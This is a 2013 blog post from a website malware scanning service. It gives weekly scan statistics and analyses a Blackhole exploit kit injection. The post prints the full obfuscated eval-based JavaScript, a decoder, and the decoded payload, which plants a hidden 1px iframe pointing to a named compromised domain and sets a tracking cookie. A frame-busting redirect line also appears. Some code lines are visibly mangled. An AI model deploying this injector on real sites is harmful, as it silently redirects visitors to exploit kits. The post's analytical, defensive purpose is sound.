Sunday, July 21, 2013

Weekly web threats review

Weekly web threats review

This statistical overview of the web based malware detected last week is based on the data compiled from the results of Online Website Malware Scanner and manual analysis. 

Online Website Malware Scanner
Online Website Malware Scanner

Website scan report

Upon each scan job done the website is assigned the status.
Currently, we are dividing websites into following categories:
The malware scan report provides exact breakdown of the files and the reasons for each detection.
In simple words for websites that are in Clean category our online automatic website scanner was not able to identify any suspicious elements in the successfully retrieved and scanned files.

At the time this article is created, the weekly distribution of submitted unique domains is as follows:
  • Clean websites: 74.6% (5048)
  • Potentially Suspicious websites: 15.7% (1060)
  • Suspicious websites and Malicious websites: 7.9% (533)
  • Unreachable/Invalid input: 1.6% (122)

Threat level evaluation

So what are the threats that worth to highlight? The majority of detected malware refers to variants of the Blackhole exploit kit. The resulting malicious action injected hidden iframe to daily unique visitors.
The logic implemented in the code:
a: Test if cookie exists
b: If cookie doesn't exist, inject hidden iframe to XXX and set cookie for the next 24 hours.

Malware analysis with example

Here is the threat dump of the website that redirected visitors' browsers to cooperjuriti.agr[.]br


  1. = window;
  2. aq = "0x";
  3. ff = String;
  4. ff = ff.fromCharCode;
  5. try {
  6.     document["body"] ^= ~1;
  7. } catch (d21vd12v) {
  8.     v = 123;
  9.     vzs = false;
  10.     try {
  11.         document;
  12.     } catch (q) {
  13.         vzs = 1;
  14.     }
  15.     if (!vzs) e = w["eval"];
  16.     if (1) {
  17.         f ="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5e,6b,71,6a,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5e,6b,71,6a,5b,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,5a,66,66,67,5c,69,61,6c,69,60,6b,60,25,58,5e,69,25,59,69,26,5a,63,60,62,25,67,5f,67,1e,32,4,1,17,5e,6b,71,6a,5b,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,5e,6b,71,6a,5b,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,5e,6b,71,6a,5b,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,5e,6b,71,6a,5b,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,5e,6b,71,6a,5b,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,5e,6b,71,6a,5b,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,5e,6b,71,6a,5b,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,5e,6b,71,6a,5b,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,5e,6b,71,6a,5b,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5e,6b,71,6a,5b,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"["split"](",");
  18.     }
  19.     w = f;
  20.     s = [];
  21.     for (= 2 - 2; - i + 1345 != 0; i += 1) {
  22.         j = i;
  23.         if ((031 == 0x19))
  24.             if (e) s = s + ff(e(aq + (w[j])) + 9);
  25.     }
  26.     fafa = e;
  27.     fafa(s)
  28. }


Simplified threat version


  1. <script>
  2. ="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5e,6b,71,6a,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32...,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"["split"](",");
  3. = "";
  4. for (= 2 - 2; -+ 1345 != 0; i += 1) { s = s + String.fromCharCode(eval("0x" + (f[i])) + 9); }
  5. alert(s);
  6. </script>


Decoded malicious payload injects hidden iframe and setting cookie


  1. function zzzfff() {
  2.     var gtzsd = document.createElement('iframe');
  3.     gtzsd.src = 'http://cooperjuriti.agr.br/clik.php';
  4.     gtzsd.style.position = 'absolute';
  5.     gtzsd.style.border = '0';
  6.     gtzsd.style.height = '1px';
  7.     gtzsd.style.width = '1px';
  8.     gtzsd.style.left = '1px';
  9.     gtzsd.style.top = '1px';
  10.     if (!document.getElementById('gtzsd')) {
  11.         document.write('<div id=\'gtzsd\'></div>');
  12.         document.getElementById('gtzsd').appendChild(gtzsd);
  13.     }
  14. }
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  18.     if (nDays == null || nDays == 0) nDays = 1;
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.     document.cookie = cookieName + "=" + escape(cookieValue)
  21.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  23. function GetCookie(name) {
  24.     var start = document.cookie.indexOf(name + "=");
  25.     var len = start + name.length + 1;
  26.     if ((!start) &&
  27.         (name != document.cookie.substring(0, name.length)))
  28.     {
  29.         return null;
  30.     }
  31.     if (start == -1) return null;
  32.     var end = document.cookie.indexOf(";", len);
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  36. if (navigator.cookieEnabled)
  37. {
  38.     if (GetCookie('visited_uq') == 55) {} else {
  39.         SetCookie('visited_uq', '55', '1', '/');
  40.         zzzfff();
  41.     }
  42. }


Similar cases with malware analysis and detection



Frame-busting pattern redirect

Another interesting website scanner detection was obfuscated code that used frame-busting pattern to redirect website visitors to URL specified in previously injected hidden iframe.

The redirection body looked like this:
  1. if (top.location != self.location) top.location = self.location;


Full threat dump:


Suspicious decryption module

Finally we detected some packed suspicious JavaScript decoder. There is high probability that it may be used to hide the malicious activity. 

Threat dump and analysis here: 

Malware clean-up


Such malware and other threats are often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for scheduled scan and remediation assessment.